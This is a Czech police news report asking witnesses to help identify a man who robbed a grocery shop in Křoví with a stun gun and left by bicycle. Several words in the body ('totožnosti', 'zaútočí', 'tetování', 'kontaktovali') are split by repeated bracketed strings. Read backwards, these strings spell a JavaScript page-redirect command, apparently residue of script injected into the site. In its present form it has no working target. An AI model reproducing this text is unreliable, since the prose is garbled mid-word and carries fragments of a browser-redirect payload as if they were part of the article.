Rainbow page separator

Lupič přepadl prodejnu, policisté žádají veřejnost o pomoc

Čtvrtek, 22. dubna 2021

Křoví, Žďár nad Sázavou / Žďárští kriminalisté se obracejí na veřejnost se žádostí o pomoc při zjištění [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožnosti muže, který je důvodně podezřelý ze spáchání trestného činu loupeže. Loupežné přepadení se odehrálo v úterý 20. dubna zhruba deset minut po sedmé hodině v prodejně potravin U Ráčků v Křoví. Muže, jenž si nejdříve vybral pečivo, které u pokladny zaplatil, zachytil kamerový systém instalovaný v prodejně. „Poté, co zboží zaplatil, zůstal stát v ruce s paralyzérem a požadoval po prodavačce, aby otevřela pokladnu, jinak na ni zaú[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točí. Žena v obavě o svůj život pokladnu otevřela a muž z ní sebral papírové bankovky a kovové mince v řádu několika tisíc korun,“ popsala policejní mluvčí Dana Čírtková. Poté odešel ven a od obchodu s největší pravděpodobností odjel na kole.
Do pátrání se zapojily policejní hlídky včetně vrtulníku, nicméně bezvýsledně. Kriminalisté na základě vyhodnocení kamerových záznamů a výpovědi prodavačky získali poměrně přesný popis podezřelého. „Jedná se o muže ve věku zhruba 30 – 35 let, který mluvil česky bez jakéhokoliv zvláštního přízvuku. Na sobě měl mikinu červené barvy, která měla na rukávech, bocích a kolem krku kombinaci s tmavě šedou barvou, tmavě šedivé nebo tmavě modré kalhoty a na hlavě bílou čepici. Na očích měl dioptrické brýle a na obličeji nasazenou roušku. Na levé ruce mezi palcem a ukazováčkem by mohl mít drobnější te[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování. K jízdnímu kolu, na němž od prodejny pravděpodobně odjel směrem k nedalekému lomu, se bližší popis nepodařilo získat,“ upřesnila mluvčí.
Kriminalisté se obracejí na případné svědky, kteří si v inkriminovanou dobu všimli muže, který se v obci pohyboval na kole, případně ho vedl a směřoval k prodejně nebo od ní, aby kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali linku 158. Výzva směřuje také ke všem, kteří muže poznali, anebo měli informace k jeho aktuálnímu pohybu.